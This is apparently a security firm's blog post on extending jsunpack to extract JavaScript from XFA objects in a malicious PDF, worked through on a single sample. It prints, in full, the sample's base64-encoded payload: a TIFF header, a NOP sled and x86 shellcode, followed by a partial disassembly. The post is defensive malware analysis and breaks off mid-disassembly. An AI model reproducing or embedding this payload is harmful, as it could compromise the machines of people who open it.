We here at Visible Risk love open source software. Some of the best applications used by security professionals are open source; Volatility and Wireshark, to name two. We also want to contribute back to the community as much as we can. This blog post and the next will focus on analyzing malicious PDF files and the changes we’ve made to jsunpack to facilitate this analysis. The changes involve extracting JavaScript from XFA objects (part 1), handling the various encryption methods used (part 2), and parsing and analyzing object streams (also part 2). We’ve shared these changes back to the jsunpack project, so they should be available in its latest version.
Adobe Reader has had its share of vulnerabilities over the years. Because of this, PDFs are a popular delivery mechanism for client-side attacks. However, instead of focusing on creating signatures for each individual exploit, it’s usually easier and more effective to focus on the part of the attack that is most common… JavaScript.
PDFs can carry JavaScript in essentially two ways: defined in JavaScript objects or defined inside XFA objects. Since we have better things to do than manually extract this information, it would be nice if there were a way to extract it programmatically. Thankfully, there’s an open source project that already does this, the aforementioned jsunpack. As an example, we’ll use a malicious PDF with a SHA256 of 7d033b4aafbae119e9459a06530b4d4c6202fb6b697f4b048a63344c1e0bc30f.
We start by running the main jsunpack script on the PDF.
(23)>python jsunpackn.py ~/malpdf.pdf
(24)>
Well, that was disappointing. I wonder what happened? To investigate, we’ll just run pdf.py on it.
(25)>python pdf.py ~/malpdf.pdf
parsing malpdf.pdf
Wrote JavaScript (22817 bytes — 16999 headers / 5818 code) to file malpdf.pdf.out
That’s promising. Let’s take a quick look.
Looks like JavaScript to me! Let’s run it in SpiderMonkey.
(12)>js malpdf.pdf.out
malpdf.pdf.out:8: SyntaxError: missing ) after condition:
malpdf.pdf.out:8: i=7;y=bib(b,i);s=nob();if(s>=t){v=d;v+=kit(p,x);q=8;v+=bib(lab,q);
malpdf.pdf.out:8: ___________________________^
So close! And that explains why jsunpackn didn’t display anything. Let’s take a closer look at the PDF. We see that in obj 9 0, obj 6 0 is defined as an XFA object.
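To make the obj 9 0 to obj 6 0 relationship concrete, here is a minimal sketch of spotting an /XFA reference in raw PDF bytes. It is not how jsunpack's pdf.py does it; the regular expression, the find_xfa_refs name, and the sample object body are all assumptions made for illustration. It also assumes the /XFA key is not hex-escaped and points at a single stream, whereas real files may use an array of name and reference pairs instead.

```python
import re

# Matches "/XFA 6 0 R": the /XFA key followed by one indirect reference.
# Assumption: the key name is written literally (no #xx escapes).
XFA_REF = re.compile(rb"/XFA\s+(\d+)\s+(\d+)\s+R")

def find_xfa_refs(pdf_bytes):
    """Return (object number, generation) pairs referenced by /XFA keys."""
    return [(int(num), int(gen)) for num, gen in XFA_REF.findall(pdf_bytes)]

# Hypothetical object body, modelled on the description of obj 9 0 above.
sample = b"9 0 obj\n<< /XFA 6 0 R >>\nendobj\n"
print(find_xfa_refs(sample))  # [(6, 0)]
```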
Looking at obj 6 0, we see that it’s compressed.
Specifically, you see that the filter used is called FlateDecode. FlateDecode is the deflate compression method from zlib. There are several different compression types that can be used, and they can be chained together. Decompressing this stream is no worry because jsunpack already handles compressed streams. After decompressing this stream, we can see the data is XML. Since the data is XML, the simplest way to navigate it is with an XML parser. A parser also has the benefit of converting the &gt; entity back to a > for us, which is most likely what broke the if(s>=t) condition above. After making these changes to pdf.py, we extract the JavaScript again and run it.
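The decompress-then-parse step can be sketched with the Python standard library alone. This is an illustration rather than the actual change made to pdf.py: the extract_xfa_scripts name and the tiny XML document are hypothetical, and a real XFA stream is namespaced and far larger.

```python
import zlib
import xml.etree.ElementTree as ET

def extract_xfa_scripts(stream_bytes):
    """Inflate a FlateDecode stream and return the text of every <script> element."""
    xml_data = zlib.decompress(stream_bytes)
    root = ET.fromstring(xml_data)
    scripts = []
    for elem in root.iter():
        # Compare local names only, so namespaced tags like {uri}script match too.
        if elem.tag.rsplit("}", 1)[-1] == "script" and elem.text:
            scripts.append(elem.text)
    return scripts

# Hypothetical, much-simplified stand-in for the XFA data in the sample.
xfa = (b'<template><field name="f1"><event>'
       b'<script>if(s&gt;=t){v=d;}</script>'
       b'</event></field></template>')
print(extract_xfa_scripts(zlib.compress(xfa)))  # ['if(s>=t){v=d;}']
```

Note that the parser hands back the script text with the entity already decoded, so no separate unescaping pass is needed.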
(52)>js malpdf.pdf.out
malpdf.pdf.out:12: ReferenceError: vKMfFyr1 is not defined
Progress! A different error this time, a ReferenceError rather than a syntax error. What in the world is vKMfFyr1? And why would the JavaScript expect it to be defined? Looking back at the XML data, we see that vKMfFyr1 is the name of the field tag that contains the JavaScript. We also see it is the name of a tag in the <xfa:data> section. As it turns out, Adobe Reader gives its JavaScript engine an object with the name from the field tag, vKMfFyr1, and sets its rawValue property to the corresponding data in the <xfa:data> tag. In our case it’s empty, but we do need the property defined. We add those changes in and run it again.
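One way to give the script the object it expects is to generate a small JavaScript prelude from the XML before running the extracted code. The sketch below assumes exactly that approach; build_field_stubs, local_name, and the un-namespaced sample document are hypothetical, and the code assumes field names are valid JavaScript identifiers. The real pdf.py change may differ.

```python
import json
import xml.etree.ElementTree as ET

def local_name(tag):
    """Strip any {namespace} prefix from an ElementTree tag."""
    return tag.rsplit("}", 1)[-1]

def build_field_stubs(xfa_xml):
    """Return JavaScript defining one object per named field, each with rawValue."""
    root = ET.fromstring(xfa_xml)
    # Collect the text of each child of a data section, keyed by tag name.
    values = {}
    for section in root.iter():
        if local_name(section.tag) == "data":
            for child in section:
                values[local_name(child.tag)] = child.text or ""
    stubs = []
    for elem in root.iter():
        name = elem.get("name")
        if local_name(elem.tag) == "field" and name:
            # json.dumps yields a quoted, escaped string literal usable in JavaScript.
            raw = json.dumps(values.get(name, ""))
            stubs.append("var %s = {rawValue: %s};" % (name, raw))
    return "\n".join(stubs)

# Hypothetical simplified document; the field name is the one from the sample.
xfa = ('<xdp><template><field name="vKMfFyr1"><event><script>1;</script>'
       '</event></field></template><data><vKMfFyr1/></data></xdp>')
print(build_field_stubs(xfa))  # var vKMfFyr1 = {rawValue: ""};
```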
(55)>js malpdf.pdf.out
(56)>
No more errors! Still no output, though. Let’s take a closer look at the last part of the extracted JavaScript.
What does vKMfFyr1[u] = v do? It turns out u is the string “rawValue” and v is a really long string. Since we want to analyze this string, we make pdf.py print out the value of rawValue. And this is what we see:
SUkqADggAACQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQ6xe5iQMAAIs0JIn3VoA+XnQGrDTcquL6w+jk////glGqyDSG3dzcZanf3NxVGy94IzxRbNTf3Nw0mN3c3EtRQ9zZ3Ny21oGR01hM3Nzcios0t93c3LRc3tzcj4s05N3c3FkcqN43PLS9XQUTNG7e3NwjDODaoMQ0r93c3OHc/NzcodCPNHHc3NxZHKnCN2SPNLjc3NxZHKnO7Ry4V5zEV5zo4Tje3NyoBjdAi1UrtiOF7RwgLnJLg1zk3KjfSjdYi+0ctiOFIC66cxubIufc7dyDtFze3NyPizRn3NzctC4HqHE0W93c3LREs5PhjDRq3dzctty2IiMMiVU5toiF9RC8UaD4/IvtHC92g1GrzLaYU9rtB7RUIm/KNNje3NyLio+Pj4+Pj48jqdQjDFWY+MC9FR7Y3IlVObbghfUQi1Gg+NiNi+0cL3aDU9u2r7Sy3L3ctK7cqdxVu9AjqdRTm8y0JqZJODTY3dzctAEE8iCMNO/d3NyLIwxfGNCDFR7Y3LSIFnNNNETd3Ny2nLTczNzctt223CMMH4lVOTSE3dzctLkzk9mMNCHc3NztFY2NI6nMI6nQI6nUjSMMFR7Q3IlVObQuB6hxNH7c3Ny0opZfC4w0Ddzc3LbctPncj9xR0PgjqdCNI6nUIwwVHtTciVU5XTDU3tzcvO0HtKs31/00ttzc3Eq003vChYo0RNzc3FGRII221LYjIwxNP5a0hrIHB4o0XNzc3FGRJFFhJCEjI4203N7c3Iu2xSOpICMMTT/5tBFQqy2KNIfc3Nwj6yMM02rUlbTuotr8ijSU3NzcjSPrIwxXxFWA+MC9FR+87Ry4V4zsV47QV47IV6707SPtHHCaWRyo0eC9oN7w/B0T0d0bNzfnoPj4V57MV86pB1WY+MC9HtjcvFew+PhXmeBXiNmk3TZXlsRXhvzdNz/olVfoV90y7SPtHCBwWByo2x0T0d0bNyjnoPj0qT1XhvjdN7pX0JdXhsDdN1fYV900VZj4wL0e1Ny0s7Lc3LSprrCxiDTf3NzchYUftFKS0jC0yxb3sjSIIyMjjDRUIyMjIzy0yxb3sjSeIyMjI6j42Iw0riMjIx7Y3LSoqKzm8/Ompq6ysrm9uba0tfK4uLKv8rK9sbnzvuqys6S97fPj7u+5uOu/v+vtv7noueXr7unr6L7s7Om67Onp5Ont7O7s7ezr6bjpuuzv7O3p7+y/7Ovs7unr6e7suem+6b3s6+ft5+/c3NwAkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkAcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAApWOASiAJikqWIYBKkB+ASjCQhErYp4BKjauASiYAAAAAAAAAAAAAAAAAAABBQUFBQUFBQaVjgEpqaVmNM7WASqVjgEp0JASNT0uCSqVjgEp4DPOkIg6CSqJjgEpBQUFBMclki3Ewi3YMi3Yci24Ii0YgizZmOUgYdfKLRTyLVAV4AeqLciAB7jHJQa0B6IsYK1gEgfvlIN3/de9Ji1okAetmiwxLi1ocAesDLIuJ5moE/zb/1YXArXX1gThJSSoAde2WMcm1A/Ol
Excellent, jsunpack’s pdf parser has done its job.
But what about that string? It looks base64 encoded to me, so let’s treat it as such and decode it. Shown as hex, the decoded data begins like this:
49492a003820000090909090909090909090909090909090909090909090909090909090909090909090909090909090
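The decoding step is easy to reproduce. The snippet below is a small sketch that decodes only the first 16 characters of the rawValue string printed above; the variable names are illustrative.

```python
import base64

# First 16 characters of the rawValue string printed above.
prefix = "SUkqADggAACQkJCQ"
decoded = base64.b64decode(prefix)

print(decoded.hex())              # 49492a003820000090909090
print(decoded[8:] == b"\x90" * 4) # True: 0x90 is the x86 NOP opcode
```

The long run of 0x90 bytes is what makes the base64 text look like an endless repetition of "kJCQ".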
That looks like shellcode to me. Let’s analyze it. At 1534 bytes into the decoded string, there is a sequence of bytes that, interpreted as an x86 instruction, is a near call. Shellcode often uses near call instructions to find itself in memory: a near call pushes its return address, the address of the instruction that follows it, onto the stack. The shellcode can then read that address from the stack and use it to deobfuscate the rest of the shellcode.
ADDRESS | DISASSEMBLY | COUNT | EXE COUNT |
---|---|---|---|
0x40ffe9L | mov ecx,0x389 | 1 | 1 |
0x40ffeeL | mov esi,[esp] | 1 | 2 |
0x40fff1L | mov edi,esi | 1 | 3 |
